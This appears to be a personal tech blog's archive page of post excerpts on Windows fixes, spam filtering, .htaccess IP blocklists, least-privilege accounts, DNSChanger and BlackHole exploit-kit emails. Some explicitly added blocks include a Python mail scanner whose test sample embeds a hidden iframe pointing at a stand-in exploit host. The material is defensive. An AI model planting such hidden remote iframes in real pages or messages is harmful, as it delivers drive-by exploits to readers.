August 9, 2023

Fix for Logitech Setpoint won't open on Windows 10 in 2023

Back in 2016, I wrote a blog article detailing how I got Logitech SetPoint to start up with Windows. Until I found the fix, SetPoint installed and I could open and manage it, but it simply wouldn't auto-launch when I logged into Windows or install its icon in the "System Tray." Fast forward 7 years, and a new problem popped up with SetPoint not working right on a newly acquired Windows 10 laptop computer.

This new problem is that even though I was able to install SetPoint on my new-to-me Dell Latitude laptop, I was unable to launch/open the program to manage it. The installer completed and there was a shortcut on the Start Menu. But, clicking on the icon and shortcut did absolutely nothing. When I opened the folder containing the program's executable, Setpoint.exe, and clicked on it, I got a popup error message from Windows complaining that "the side by side configuration is incorrect."

Before I stumbled onto the actual fix, I tried all kinds of suggestions I found on various troubleshooting forums. I downloaded old versions of Microsoft Visual C++ packages in the hopes that the program was looking for long outdated missing components. I even tried a suggestion to run the program in Windows 7 Compatibility mode. Nope, none of this worked. ;-( So, I began following my own hunches based upon decades of experience operating and upgrading Windows computers.


December 28, 2021

Securing your Facebook account

I recently helped a Facebook friend secure his account after he accidentally got it hacked by a Nigerian 419 scammer/fraudster. The fraudster was using my friend's account to send scams to people on his Friends list via Facebook Messenger. He needed to change his Facebook password, but didn't know where to do it. This article describes how to do that.

If you are using the Facebook App (not a web browser) on a phone, tablet, or touch-screen laptop computer, log in to Facebook via the screen or desktop icon. Look at the icons along the top of your Facebook profile. At the far right is an icon with three horizontal lines. Touch that icon. A page opens labeled "Menu" on the upper left. To the right of the word Menu is a gear icon. Touch the gear icon to open your "Settings & Privacy" then follow these steps...

  1. Under the heading "Account" is a link labeled "Password and Security." When you press this link the first option is to check your "Important Security Settings." Do that and fix any serious issues.
  2. Afterward, come back to the Password & Security page and look under the heading: "Login" - where you will see: "Change password." Press that link and follow the on-screen instructions.
  3. Do not reuse an old password as they get stolen from hacked online databases. Create a strong new password that can't be guessed by a random stranger or a hack-bot using a dictionary attack to crack known words. Better yet, if your browser offers to create a strong password, let it and have the browser save/remember it.
  4. Note, you might have to add a punctuation mark, capital letter, or a number to the new password if the input field complains that the password must contain at least one of this or that character.

If you are using Facebook in a web browser, rather than an App, on a desktop or laptop computer, read the extended content for instructions for changing your Facebook password.


April 8, 2018

Acronis True Image Nonstop Backup Is Stopped - Solved

If you are a user of Acronis True Image Home 2018, for Windows, you may have tried to enable non-stop backups for folders you frequently work on. Perhaps you've encountered an error message in your System Tray saying: "Nonstop backup is stopped." If so, read on about how I solved this very problem on my own PC.

I have been using Acronis True Image for almost a decade and currently run version 2018, which I just upgraded from version 2017 (learn more about Acronis True Image on my affiliate page). My new computer is self-built (as they always have been), so I had to set up all new backups and settings. One option I decided to try out is called nonstop backups. This feature has been around for a few years, but I never explored it before.

Non-stop backups watch for changes made in your primary Documents and Pictures folders, plus a few more default folders. You can also add custom locations to monitor for changes. The Acronis nonstop backup engine checks for changed files every 5 minutes or so and saves those changes to a special folder that is saved to a drive of your choice. It is mostly useful to Webmasters, authors, tax preparers and accountants who make frequent changes/edits to files. If a protected file gets screwed up or accidentally deleted, a very recent copy can be restored very quickly via the Acronis True Image program interface. It's free with the program, so consider it another layer of backups.

After setting up my preferred folders to monitor, I selected my external USB 3.0 "My Passport" drive as the destination and enabled the feature. At first it appeared to be working, having created a hidden folder on the external drive. But, a day later, when I checked the icons in my Windows 10 System Tray (a.k.a. Systray, which contains important icons normally hidden behind an up-pointing arrow on the right side of the Windows Taskbar, near the system clock), the icon informed me that "Nonstop Backup is Stopped." This led me into an online searching frenzy where I finally found the golden words that led to a solution to this mystery.


July 9, 2017

Use RegEx to filter spam from your mail server - part 2

On the 4th of July I wrote an article explaining how you can use Regular Expressions (RegEx) to create spam filters that can be applied to a mail server for your commercially hosted domains. This article shows how to create RegEx filters to block spam based on the IP addresses of the mail servers found in the headers of incoming emails.

If you haven't read the first article in this series, I recommend you do so now. It has lots of important information that this article builds upon. It will open in a new tab so you can refer to it as necessary.

Email messages contain a section that is normally hidden from view when you read the body text. It is called the email headers, and they contain the actual routing details for each incoming and outgoing message. Some of those details can be, and frequently are, forged by spammers. But others are not easily forged, including certain numeric entries that relate to the IP addresses of the email servers through which the message has passed.

So, without any further ado, let's look at a spam filter to block unwanted IP addresses.


July 2, 2017

Protect your hosted websites from hackers with my .htaccess blocklists

If, like me, your website is on a shared hosting account, you can block unwanted traffic via an IP blocklist in your .htaccess file. This could be from hackers, scammers, spammers or automated probes for unpatched exploitable files.

What is .htaccess?

The file named .htaccess is a normally hidden server configuration file used by Apache web servers. Since most of the shared hosting websites run on this open source Apache software, the .htaccess file lets the webmaster control access to all or parts of the website under his or her personal control. The leading dot in the file name tells the Apache server that it is a special control file and to hide it from standard view. If you use a desktop FTP program to upload files to your website, you will have to find the settings option to show hidden files.

Read detailed information about how to use .htaccess here

Before you read any further, note that when editing or creating a .htaccess file, one incorrect or misplaced character or misspelled word, or even a missing required space, can cause a "Server 500" error that locks everybody out from viewing the website from the Internet, including you! Extreme caution and immediate follow-up online testing are required when altering a .htaccess file.

One of the important things you need to know when editing a .htaccess file is that personal comments and notes that are not actual commands must be preceded by a # character at the start of every line of text, including each new line you create by pressing Enter. You cannot just type in notes without prefixing them with the # character, or you will cause a Server 500 lockout error.

Example of a properly formatted .htaccess personal note or comment:
# This is a note to myself. The following directives will block Chinese traffic

You must also learn which spellings and directives (aka commands) are allowed and which are not. A misspelled directive won't just be ignored. It will cause a Server 500 error. Note that some web hosting companies may not allow you to create or alter a .htaccess file without their express permission (if so, call or email them first). Fortunately, those are few and far between. I can tell you with direct knowledge that Bluehost allows individual .htaccess files to be created and edited.

So, assuming you know how to safely edit your .htaccess file, let's delve into how my IP blocklists can help protect your Apache server shared hosting website from online hacks and probes.
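As an added illustration (this is not the author's blocklist, which is in the full article), here is a .htaccess fragment that follows the rules above: every note line starts with #, and the blocked addresses are constructed documentation-range placeholders, not real offenders. It wraps the Apache 2.4 Require syntax and the older Order/Deny syntax in IfModule tests so that only the dialect the host's server actually understands is parsed, which is what keeps a mismatched directive from producing a Server 500.

```apache
# Added example, not the article's own blocklist.
# Every note line begins with '#'; a bare note with no '#' is a Server 500.
# 203.0.113.0/24 and 198.51.100.17 are constructed placeholder addresses.

# Apache 2.4 and newer: mod_authz_core provides Require / RequireAll.
<IfModule mod_authz_core.c>
    <RequireAll>
        # Allow everyone by default, then carve out the blocked sources.
        Require all granted
        # A whole range in CIDR notation (probes from one hosting block).
        Require not ip 203.0.113.0/24
        # A single host.
        Require not ip 198.51.100.17
    </RequireAll>
</IfModule>

# Apache 2.2 (no mod_authz_core): the classic Order / Deny dialect.
<IfModule !mod_authz_core.c>
    Order Allow,Deny
    Allow from all
    Deny from 203.0.113.0/24
    Deny from 198.51.100.17
</IfModule>
```

After uploading, load the site in a browser right away: a normal page means the file parsed, a Server 500 means a typo in a directive and the last change should be reverted.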


May 27, 2017

The nuts and bolts of operating as a less privileged computer user

Anybody who has read my computer forum posts and blog articles over the years knows that I am a proponent of using less privileged computer user accounts for daily use, rather than an Administrator account. While you may have a few extra hoops to jump through, they aren't that complicated. And, you will greatly reduce your likelihood of having your computer compromised by well over 90% of the malware in circulation today (see footnotes).

Why you should not operate a Windows PC from an Administrator account for your daily browsing and email.

Most computer malware targets Windows operating systems and usually depends on installing malicious files and "backdoors" into operating system folders, and/or modifying legitimate system files to do illegal things (like sending spam, participating in distributed denial of service attacks, hosting credential phishing web pages or pages promoting useless herbs and dangerous counterfeit drugs, installing keyloggers that steal your login credentials, downloading fake security and extortion programs, theft of confidential documents, etc). Only administrator accounts have permission to install such files into system folders, or modify system files and settings. Once in the system folders, the cybercriminals behind the malware may have total control over that computer. This is referred to by hackers and Botmasters as being "Pwned."

Some malware attacks target your web browsers and their components and plug-ins (like Flash Player, Java, PDF readers and other media players). Many Ransomware attacks come via hostile email attachments or poisoned links to compromised websites. Still other attacks are Internet "Worms" that scan computers connected to the Internet looking to exploit new and old vulnerabilities in various Windows operating systems, or Microsoft Office programs. If an exploit attack isn't blocked by up-to-date anti-malware protection, and it detects that the account in use has administrator privileges, the exploit script will continue until it is fully entrenched, often without any user interaction until it's too late.

However, if the same attacks as above (written to infiltrate system files and folders) are launched against a computer that is running as a less privileged account, the malware installation will likely fail and exit. Or sensing that it requires higher privileges, it may open UAC boxes asking for your administrator password and permission to install it. Unless you are tricked into allowing this to happen, refusing to grant this permission will halt the malware, or severely limit its impact. Your own user account could still be compromised, but not other password protected user accounts or operating system files (which also includes "Program Files").

The rest of this article deals with the steps to take to change your Administrator user account into a less privileged Standard User account on a Windows 10 computer.


October 17, 2016

Fix for Logitech SetPoint doesn't launch with Windows 10

If you arrived here while searching for help because Logitech SetPoint installs but won't open due to a side-by-side configuration error, read the newer article I wrote in August of 2023 about how I solved that problem.

October 16, 2016

I have a self-built computer that I upgraded from Windows 7 to Windows 10. It was recently upgraded to the Anniversary version, build 1607. Shortly thereafter, I began noticing that the double click action I had chosen for the wheel button on my Logitech M300 mouse was no longer happening. Here's how I fixed it!

At first I thought it was just a glitch, until the day I went to access the SetPoint icon in the System Tray - which had always been there - and found that it was no longer there. Rebooting had no effect either. Pfft, the icon was gone!

The missing System Tray (Systray) icon was responsible for all custom mouse settings and its disappearance left me with only basic mouse actions. So, I began my troubleshooting by reinstalling SetPoint. Despite the process going through to completion, the icon did not reappear in the Systray. I then went to Logitech.com and downloaded the most recent version of SetPoint and installed it. Still, no Systray icon and no settings that survived a reboot.

I then Googled the problem and found all kinds of people were having the same issue. Some were running Windows 10, others Windows 8. Evidently, some update broke the installation of the SetPoint Systray file, SetPoint.exe, and its icon. Unfortunately, none of the suggestions I read fixed my problem. So, I used my own intuition and ended up fixing it myself (this ain't my first rodeo).


May 30, 2016

How I restored sanity to my Windows 10 upgraded computer

My First Windows 10 Upgrade Attempt

Prior to using Windows 10, my current self-built computer ran on Windows 7 Home Premium. I kept it up to date with Service Pack 1 (the only one released for Windows 7) and all important Windows updates, as well as all third party programs I installed and browser plug-ins and add-ons. Very importantly, I operated as a Windows 7 "Standard User", not as an Administrator. Read why you should operate as a less privileged user.

I have never been afraid to experiment with my computers, all of which I built from scratch. I have updated every one to a newer O.S. since my first Windows 3.1 PC was upgraded to Windows 95. I still have floppy disks to prove it!

And so it happened that when Windows 10 was made available to the public during the Fall of 2015, I went for the free upgrade (saving an Acronis full system image, plus a Windows 7 Backup image, just in case). Nothing went right that time, with many programs crashing or failing to open properly, including the new to me XAML Start menu and notifications window. Fortunately for upgraders, Windows 10 allows us a 30 day grace period to roll back to our previous operating system. After that your Windows 7 license expires and you are locked into Windows 10. So, I used the built-in recovery option to roll back to Windows 7, which had some icons with padlocks and wrong permissions issues, but otherwise went smoothly, and waited for improvements to be made to Windows 10. Two months later I was ready to try again!


October 28, 2015

Fix for Desktop icons have padlocks after downgrading from Win 10 to Win 7

My primary home computer is a self-built Windows 7 Home Premium, 32-bit PC. My secondary computer is a Dell Latitude laptop, which I keep in my shop. Back in early September, I upgraded the laptop from Windows 7 to Windows 10. To this day, everything has continued to work excellently on the laptop. Based on that success I decided to try upgrading my main "production" computer to Windows 10.

After trying out Windows 10 for three days in October, 2015, I encountered some software compatibility and Windows Update problems that left me more and more aggravated. I decided that I would downgrade the computer to Windows 7 and wait for more updates to both Windows 10 and, hopefully, some of the affected programs.

Since I chose to downgrade/rollback to my previous O.S. within 30 days, that option was found in the Start menu by clicking on "Settings" > "Update & Security" > "Recovery." You should see a "Go back to Windows (7 | 8 | 8.1)" option, with a "Get Started" button. Click on Get Started and answer the questionnaire about why you want to roll back, then click "Next" to continue the downgrade process.

Note: if more than 30 days have passed since you upgraded to Windows 10, the rollback option will disappear. You will have to restore from a saved image file, or do a clean install of your previous operating system.

All told, the rollback to Windows 7 went fairly well, as my accounts and settings were still intact and my installed programs still functioned as before. However, some things got screwed up in the process. Among those screw-ups, after downgrading and logging back into Windows 7, many desktop icons now had a padlock in the icons, where shortcut arrows used to be. This happened to my Administrator level and Standard User accounts.

Those locks were never there before! It took a little sleuthing to learn a fix for this event, as well as to understand what caused it. Here's how I fixed them and a few other new problems.


July 9, 2015

I found a solution to the blank Get Windows 10 screens

Ever since the appearance of the Get Windows 10 icon in the System Tray of my Windows 7 Home Premium self-built PC, the screen that I clicked on always opened totally blank. I read all kinds of forums and applied every recommended update. I even tried running the McAfee uninstaller, despite never having had their anti-virus programs installed. However, I did get the McAfee Safety Scanner bundled with some software update in the past. Running it did not fix the blank screen problem for me.

I finally found the solution to the blank Get Windows 10 screen on my own and will share it with you all. I also own a Dell Latitude laptop running Windows 7 Home Premium and it is displaying the Get Windows 10 screen information properly. Out of curiosity, I opened its Status screen yesterday to watch what actually occurred as it loaded. I noticed a distinct click sound as the W10 Reserved details populated the window. A lightbulb turned on in my befuddled brain!

Today, on my home-built Windows 7 Home Premium PC, I solved the blank Get Windows 10 screen problem that has eluded me for most of a month, since the icon first appeared in my SysTray. It was a pure hunch that paid off.


June 1, 2014

Windows Live Mail spam filter rule to delete Russian domain messages

It seems to me that no matter what other types of email spam I get, Russian fake pharmacy links are always showing up. It appears to be their fallback money maker when other scams fail. This article describes how Windows Live Mail users can create a spam filter that blocks Russian domain messages.

If you are one of the many people worldwide who bought into MailWasher Pro, you are probably already aware of and using my published MailWasher Pro Spam Filters. If you are monitoring that page using ChangeDetection.com, you are already aware of how frequently I have been updating my filters to respond to new spam tricks. I do this on a voluntary basis, working on my own time, with only a donate button to offer any chance of a payment.

While my spam filters can be added to MailWasher Pro using a simple, well documented procedure (explained on my filters page), folks using other email clients have to do more work to use them. Most modern desktop email clients and several of the better web browser based email systems allow users to create their own spam filters. The ones that work the best allow the use of Regular Expressions and multiple conditions (logical "AND" or "OR"). Windows Live Mail (WLM) has a half-decent spam rule system which, although it doesn't allow Regular Expressions, can be used to at least approximate many of my spam filters. Instead of being able to combine multiple words or phrases into single line rules, WLM forces us to use plain text, one word or phrase at a time, which can then be combined using either AND or OR conditions. Rules can be set for various email fields, including the more important From, Subject and Body. The following is a rule I created to demonstrate how one might filter out Russian domain scams.

My definition of Russian domain spam includes email messages with Russian domains in the From field as well as in the message body. Russian domain names end in the Country Code: .RU (plus a few related former Soviet Union Country codes).


March 12, 2014

Email filter rules to block spam for counterfeit Pfizer products

Almost everybody who has used an email account to send or receive email has received 'tons' of spam messages promoting the illicit sale of counterfeit male performance drugs, such as Viagra.

These spam email messages often have the words "Viagra" or "Pfizer" in the From (Sender) field, to try to catch the attention of gullible people, imploring them to click on the enclosed links, leading to fake online pharmacies, selling counterfeit drugs, for which the spammers act as paid affiliates.

The folks that do knowingly click on links to buy Viagra (or Cialis, or Levitra) from these fake pharmacies are bypassing the only protection their country's medical system offers: the requirement to consult your physician and be tested to see if you are able to safely use that drug without the risk of serious consequences, and if so, at what dosage. They are placing themselves at serious medical risk by purchasing unregulated drugs that are produced by counterfeiters in Asia.

Most of the fake Viagra pharmacies dispensing Asian drugs are hosted on Russian domains, owned by Russian and Ukrainian drug spam syndicates using payment portals friendly to cybercriminals.

Last, but not least, Americans who purchase prescription drugs from foreign online pharmacies that ship the drugs to the USA, are violating Federal laws that forbid the personal importing of prescription drugs from abroad. Penalties start with seizure of the packages and may go up to fines and imprisonment for repeat offenders or distributors.

If you are not one of the gullible people who click on links in spam messages and are not interested in even seeing this kind of garbage in your email client's inbox, read on.

As a long-time spam fighter, I have been writing anti-spam filters for use in MailWasher Pro, which is made by Firetrust Ltd, based in New Zealand. I publish my own MailWasher spam filters for others to use, at no charge (other than the occasional donation). Note that these filters are specific to MailWasher Pro.

Lately, I have received a few requests from non-MailWasher users to show them how my spam filters can be "ported" for use in certain desktop email clients, like the long-deprecated Outlook Express or Windows Live Mail, and even to Mac Mail. While I cannot "port" my entire filter set to another program, I can explain how particular filters can be composed in, say, Windows Live Mail, to do basically the same thing. I'll even go one step further and show how Webmasters and domain owners who have websites hosted on servers running cPanel can create custom spam filters to block email for counterfeit Pfizer drugs, or anything else that is known spam.


October 2, 2013

Comcast Voice users: How to block 24 phone numbers on Comcast.net

October 3, 2013

If you use Comcast Voice services, you are allowed to block just 12 unwanted phone numbers. For most of us, those numbers will be telemarketers. This short article shows you how to block an additional 12 numbers, using the online Comcast.net portal.

You may wonder why you get so many unwanted telemarketing phone calls, even though you have signed up your numbers on the Do Not Call Registry (www.donotcall.gov). The reason is that the people hiring the telemarketers and Robo-callers make much more money in commissions than the fees to make these calls and any fines they face if caught and prosecuted. Ditto for the telemarketing boiler rooms.

So, say you subscribe to Comcast for your home phone service and you are pestered by a lot of telemarketers. You can add their phone numbers to a block list, one at a time, as they come in, via a sequence of keystrokes. Or, you can login to your Comcast.net online account and add these phone numbers to a blocked callers list. That is, until 12 phone numbers have been saved. After that you'll have to delete numbers to add new ones to the Blocked Callers list.

Twelve blocked telemarketers ain't nothin' folks! I know it and you know it. Those pesky bastards keep calling from new numbers as the old ones get blocked by major carriers, or due to occasional action by the FTC. But, blocking 24 numbers would be much more effective, at least for a few months. I'll show you how to do this further in this article.


December 13, 2012

Fix for MovableType loses ability to assign categories to entries

I first noticed the category assignment problem in November, 2012. I published an article on my MovableType blog and was annoyed when I didn't see the category I checked appear below the category box. I thought I was imagining things and saved the article. The same thing happened with several more articles. Yesterday I published another article and had the same problem of not being able to assign the entry to a category and it got my goat.

Late tonight I got really curious as to why I couldn't assign categories to my entries anymore and set out to discover whether anybody else had the same problem. At 2AM tonight, I found the cause and a solution.

I use Firefox as my default web browser and always upgrade when a new version comes down the stable release channel. Right now I am typing this in Firefox 17.0.1. The version I was using a month ago was 16.x, and I was using Firefox 15.x when I published my last article that I could assign a category to. Something has changed in Firefox, not MovableType!

After a brief Google search for "MovableType can't select categories for entries" I came across a MovableType Community forum topic about this very problem. All affected users were using Firefox 16 and newer, just like me. Fortunately for all of us, MovableType support figured out what had gone wrong in Firefox and has provided us with a patch. Actually, they provided 4 patches, for versions 4.28, 5.07, 5.14 and 5.2. People using any sub-version of MT 4.x should download the patch for MT 4.28. It is backwards compatible across most of v4.

The patch links are found on the community support page titled: Patch file for Firefox 16 users. Choose the file that most closely matches your installation of MovableType.


December 6, 2012

How to disable the new tab move centering animation in Firefox 17+

This article is for Firefox version 17+ users who open many tabs at a time in one browser window. If you regularly reposition some tabs and are aggravated with the changes to the way tabs now move to the center of the tab bar when you drag them, I found a solution to revert to the old behavior.

Firefox web browsers are known as tabbed browsers because they allow you to open multiple web pages inside one browser window, each in its own separate clickable tab. Clicking on a tab brings that web page into view, hiding all others behind their clickable tabs. These tabs contain the title of the document, as is displayed in the "Title Bar" that one normally sees on top of a browser window.

When one opens multiple websites, or HTML pages in separate tabs, inside one browser, the tabs line up next to each other, to the right of the previous tab, in the order in which they are launched. Normally, they are launched by the same code that used to cause a new browser window to appear. That HTML code is: target="_blank". If one clicks a hyperlink in an email message from their desktop email client, the web link will open in a new tab all the way to the right side of all previously opened tabs.

The location of the open tabs in the Firefox browser is called the "Tab Bar." By design, users have always been able to drag any tab to a different position in the tab bar. This allows one to position the most important tabs to one side or the other. I usually group my always opened tabs towards the left side of the tab bar, then open or move new tabs to the right of my primary tabs.

Let me describe what I am referring to. In previous versions of Firefox, when one had a lot of tabs open in the tab bar and wanted to relocate one or more tabs, you dragged one tab to the new position and dropped it there. Sometimes, when more than 10 or 12 tabs are open, this required us to move that tab beyond the entire visible row of open tabs. One could see the other tabs move to the right or left at whatever speed you moved the dragged tab at. When you found the desired new location, you let go and there it stayed. If you needed to move a group of related tabs to a new location, you dragged one all the way to the right or left edge and dropped it off. Then, you began dragging the rest next to it and each other, forming a little freight train of tabs. One could do this until the entire group was fully relocated in the tab bar.

The new behavior has made moving one's tabs into a game of chance. The wise guys at Mozilla have animated the tabs that are being dragged so that they remain basically centered in the tab bar as you drag them around! Move it three browser widths and it is still apparently in the middle of the tab bar. Want to gather other related tabs to the same location? Good luck! Go find them using the right/left arrows, or the master tab finder button at the right edge of the tab bar. Then, you have to drag each one, one at a time, to the new location, next to the first one you moved. Each time you drag a tab, it appears stationary and centered, even though it is flying past other tabs. This is most frustrating!

I found a fix that can be added to the browser's configuration page. It is one line of code, with one switch.

Continue reading "How to disable the new tab move centering animation in Firefox 17+" »


July 19, 2012

How to disable or re-enable the Windows 7 Gadgets sidebar

For the last few weeks I have been reading security bulletins warning us to turn off the Windows Gadgets sidebar, which is a feature introduced on Windows Vista and continued on 7. Two security researchers, Mickey Shkatov and Toby Kohlenberg, have announced that the Gadgets Platform is basically exploitable and are going to present their evidence in a keynote presentation at the upcoming Black Hat Convention, on July 26, 2012, at Caesars Palace, Las Vegas, Nevada.

According to the Black Hat USA 2012 briefings page, here is what these guys are going to reveal: "We will be talking about our research into creating malicious gadgets, misappropriating legitimate gadgets and the sorts of flaws we have found in published gadgets." Once their findings go public, hackers and cybercriminals will begin adding the published exploits to attack kits already in use (like the BlackHole, or Phoenix Exploit Kits). That is when it is going to hit the fan!

The Gadget sidebar is actually the Windows Gadget Platform. Misters Shkatov and Kohlenberg have notified Microsoft about their findings and in response, and without going into any meaningful details, Microsoft has issued a security advisory calling on concerned people everywhere to disable their (Windows Vista and Windows 7) Gadgets and Sidebars!

Here is the warning on the Microsoft Security Advisory (2719662) page:


An attacker who successfully exploited a Gadget vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take complete control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

The following paragraphs show two methods of disabling, or re-enabling your Windows Gadgets and Sidebar.

Continue reading "How to disable or re-enable the Windows 7 Gadgets sidebar" »


July 8, 2012

How to restore proper DNS Server settings altered by DNSChanger

On March 6, 2012, I wrote an article explaining the extended cutoff date of July 9, 2012, for computers that had been infected with the "DNSChanger" malware, during 2011. That date arrives tomorrow! Are you sure that your computers and routers are not still using the temporary DNS servers soon to be disconnected? If they are, your DNS Server settings are pointing to a temporary Court Ordered interim server that will be disconnected sometime on July 9, 2012.

I am posting this because there are still about 270,000 unique IP addresses using the DNS Server IP addresses that were changed in computers and routers infected by the DNSChanger malware. They are all being rerouted to the temporary DNS Server arranged for by a Court Order obtained by the US FBI, after it took down the servers being used by the Rove Digital criminal enterprise, based in Estonia, and had the people involved arrested. The statistic about infected IP addresses is logged by the DNS Changer Working Group (DCWG) and is obtained from access logs from the temporary DNS Servers.

The DCWG website also supplies links to websites around the World where people can go to test their computers and routers in their own languages for evidence of the DNSChanger infection. They also have a page listing numerous free legitimate online security scanners and downloadable security software to identify and remove the DNSChanger malware.

The first thing anybody reading this should do is verify that their own computers and routers are not infected. You can do this by visiting this page at the DCWG. If the results are in green, your connection is not using the so-called "Rogue DNS Servers" set up by the Rove Digital crime gang in Estonia. But, if you see RED, either your computer is still infected, or if disinfected, has not had the proper DNS Server settings restored, or your router has been altered by the malware and needs to be changed to use the DNS Servers belonging to your ISP, or some other preferred DNS provider (e.g. OpenDNS, which I use).

What can I do if the test at DCWG says I am infected?

Continue reading "How to restore proper DNS Server settings altered by DNSChanger" »


June 14, 2012

New email BlackHole exploit attack has embedded JavaScript & iframe

A few days ago I discovered an email scam that tries to directly deliver the BlackHole Exploit Kit to victims, inside the message body of those emails. The Subject used was: "Re: URGENT" and the sender addresses spoofed Twitter, LinkedIn and sbcglobal.net customers. In all cases, the hostile code was no longer reached via links, but simply by opening the email in your email client, with HTML display enabled and iframes allowed.

Rather than delving into a big technical discussion about the exploit itself (which I have covered numerous times), this article will attempt to help protect you from being exploited by it, or another like it.

We first need to define how the attack inside these email messages is triggered. It is a two-pronged attack. The first prong is the exploit code itself, embedded inside the message body within <script> tag sets. The second is an HTML "iframe" tag whose "src" (source) is a remote server or website that is hosting the BlackHole attack kit.

The criminals that sent this to you are hoping to exploit you if your email reader is set to render HTML and scripting. Many users allow these things by default. The second method is used to attack you in the event you disallow scripting, but do allow iframe contents to be rendered. This is a tricky one-two punch.
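As an added example (not code from the original article), the following Python scanner shows how a mail gateway or desktop filter can detect the two prongs just described before an HTML message is rendered: inline `<script>` blocks and `<iframe>`/`<frame>` elements whose `src` points at another host. It also counts inline event-handler attributes and `javascript:` URLs, which are further ways of running script from a message body. The sample HTML, the host name `exploit-host.example` and the verdict labels are all constructed for this example; the script element holds only a placeholder comment.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit


class ActiveContentScanner(HTMLParser):
    """Counts inline scripts and collects frame sources from an HTML mail body."""

    def __init__(self):
        super().__init__()
        self.scripts = 0            # <script> elements (the first prong)
        self.remote_frames = []     # <iframe>/<frame> src on another host (the second prong)
        self.event_handlers = 0     # onload=, onerror=, ... attributes
        self.script_urls = 0        # href/src values starting with "javascript:"

    def handle_starttag(self, tag, attrs):
        attrs = {name.lower(): (value or "") for name, value in attrs}
        if tag == "script":
            self.scripts += 1
        elif tag in ("iframe", "frame"):
            src = attrs.get("src", "").strip()
            if urlsplit(src).netloc:    # absolute URL: content is fetched from a remote server
                self.remote_frames.append(src)
        self.event_handlers += sum(1 for name in attrs if name.startswith("on"))
        for name in ("href", "src"):
            if attrs.get(name, "").strip().lower().startswith("javascript:"):
                self.script_urls += 1


def scan_html_body(html: str) -> dict:
    """Parse an HTML body and report every kind of active content found."""
    scanner = ActiveContentScanner()
    scanner.feed(html)
    scanner.close()
    return {
        "scripts": scanner.scripts,
        "remote_frames": scanner.remote_frames,
        "event_handlers": scanner.event_handlers,
        "script_urls": scanner.script_urls,
    }


def verdict(report: dict) -> str:
    """'quarantine' if any scripting or remote frame is present, else 'ok'."""
    active = (report["scripts"] or report["remote_frames"]
              or report["event_handlers"] or report["script_urls"])
    return "quarantine" if active else "ok"


# Constructed sample of the two-pronged message described above. The script
# body is a harmless placeholder comment and the frame host is a made-up name.
SAMPLE_EMAIL_HTML = """<html><body>
<p>Re: URGENT - please review the attached statement.</p>
<script type="text/javascript">/* placeholder: the real message carries an obfuscated loader here */</script>
<iframe src="http://exploit-host.example/main.php" width="1" height="1" style="visibility:hidden"></iframe>
<img src="cid:logo@example.invalid" alt="">
</body></html>"""

# Constructed benign message: plain markup and an ordinary link.
BENIGN_HTML = """<html><body>
<p>Your statement is ready.</p>
<a href="https://www.example.com/login">Sign in</a>
</body></html>"""


if __name__ == "__main__":
    for label, body in (("sample", SAMPLE_EMAIL_HTML), ("benign", BENIGN_HTML)):
        print(label, verdict(scan_html_body(body)), scan_html_body(body))
```

The scanner works on the raw body, so it catches the iframe even in a client that has scripting disabled but still renders frames, which is exactly the gap the second prong is aimed at. Treating any remote frame as grounds for quarantine is deliberate: legitimate newsletters have no reason to embed another site's page in a message.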

Here are some ways you can protect your computers from being exploited by the embedded BlackHole attacks.

Continue reading "New email BlackHole exploit attack has embedded JavaScript & iframe" »


February 14, 2012

PCs infected with DNS Changer to lose Internet connections on March 8, 2012

The Internet can be a very dangerous place to be anymore. There are more malicious software (malware) threats out there than you can shake a stick at. The DNS Changer Trojan is one that needs to be mentioned right now. If you own or use a PC infected with the most recent variation of the DNS Changer, you may lose your ability to access the Internet on March 8, 2012.

What does DNS stand for?

DNS stands for Domain Name System. This is a system of electronic devices known as routers which locate websites you want to access by their common name, then translate those names into the numeric codes assigned to the web servers hosting those domains (websites). Every website is hosted on a computer that has a numeric address, known as an IP address, assigned to it. The DNS system searches and drills down through multiple layers of routing details until a numeric match is found for the website domain name you are trying to access.

For instance, my website, wizcrafts.net, is currently hosted on a web server belonging to Bluehost, with an assigned IP address of 66.147.244.184. It is reached after requests are routed from your home or business connection, through any required intermediaries, until the request ends up in Utah, at the facility owned by the hosting company. There, the internal routers sort out which one of hundreds of servers in their facility is actually hosting my humble website. All this happens in the blink of your eye!

It's not just websites that use the DNS system. Your very own Internet connection is also part of that system. You get your Internet connection from a local Internet Service Provider (ISP), via a modem, or Wi-Fi, or cellular network, or hard-wired wide area network. Your connection has an IP address assigned to you by your ISP. When you access the Internet to browse websites you are usually going to use DNS servers belonging to your ISP. These DNS servers relay your requests for websites, or other Internet resources, to various upstream Domain Name Servers around the world.

When you connect to your ISP, their system assigns their primary and secondary (in case one fails) DNS servers to you, to use for accessing the Web. You trust those DNS servers to faithfully relay your requests to the desired target websites, or other resources (newsgroups, IRC, IM, email, ftp locations, online storage, etc). But, what if somehow, those good DNS servers belonging to your ISP were replaced with rogue servers owned by cyber-criminals?

Continue reading "PCs infected with DNS Changer to lose Internet connections on March 8, 2012" »


December 27, 2011

How to install MBAM and Trend Micro Internet Security on same PC

This article is targeted at security-conscious people who have purchased Trend Micro security programs to protect their PCs and also want to keep an existing installation of Malwarebytes' Anti-Malware on those computers.

I am one of those people. I have a subscription for Trend Micro Titanium Anti-Virus and Malwarebytes' Anti-Malware (MBAM). I recently was notified that I was entitled to a free upgrade to version 2012 of Trend Micro, so I downloaded it from their website. Up to that point both programs were getting along just fine. Ah, but change awaited me.

The upgrade was a simple process that combines uninstalling the previous edition (2011) and installing the newer version (2012). After the uninstaller removes the previous version you are instructed to reboot. Here is where I encountered my first obstacle.

Privileges

I operate as a Windows 7 "Standard User" - which is similar to a Windows XP Pro Power User. That means I have more privileges than a "Limited User" - but less than an Administrator. I like it that way. This type of account reduces my chances of accidental exploitation to single digits (see my articles about privileges, here, here and here). It means that in order to install security programs, or any program requiring access to operating system files, I must use the "Run As Administrator" right-click option when installing such programs.

I was working inside my Standard User account when I received the notice about the free upgrade to Trend Micro 2012, so I ran the installer using Run As Administrator. The first step was to uninstall my existing version (2011) of Trend Micro Titanium, then reboot. Everything went fine until I rebooted into my Standard User account.

Continue reading "How to install MBAM and Trend Micro Internet Security on same PC" »


December 14, 2011

MailWasher spam filter for links to .htm files with huge query strings

